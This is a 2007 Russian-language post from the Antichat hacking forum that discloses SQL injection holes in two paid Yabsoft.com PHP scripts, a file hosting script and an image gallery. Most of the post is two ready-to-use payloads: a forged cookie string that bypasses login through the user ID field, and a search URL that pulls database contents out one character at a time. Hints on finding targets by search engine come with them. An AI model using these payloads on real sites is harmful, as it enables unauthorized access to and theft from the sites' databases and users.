ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Advanced Image/FILE Hosting Script
  #1  
Старый 28.06.2007, 13:20
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию Advanced Image/FILE Hosting Script

Уязвимости в платных продуктах от Yabsoft.com , в галлерее и скрипте файлообменника.Для эксплуатации обоих требуется magic_quote_gpc off.

MFH - иньекция в куках ( google )

Код:
yab_uploadmode=2; pass_hash=0; yab_logined=1; yab_last_click=1183021167; yab_autologin=1; yab_uid=0'+or+1=1/*; yab_passhash=c4ca4238a0b923820dcc509a6f75849b;yab_uploadmode=0;yab_sess_id=123;
AIM - возможен посимвольный перебор информации , хранящейся в базе данных. ( google )

Код:
http://www.yabsoft.info/demo/aihspro/search.php?text=%')+or+ascii(substring((select+1+from+users+limit+1),1,1))%3E0/*&dosearch=Search
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Куча скриптов =)) SK | Heaton PHP, PERL, MySQL, JavaScript 37 01.02.2008 15:23
Steps To Deface A Webpage (About Defacers) bxN5 Forum for discussion of ANTICHAT 3 11.03.2007 03:04
Pубрика "Полезные решения на PHP" Utochka PHP, PERL, MySQL, JavaScript 28 23.05.2006 10:06
Новый Мултиплеер для GTA:VC - vc-mp xSp1D3R Болталка 5 16.08.2005 02:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ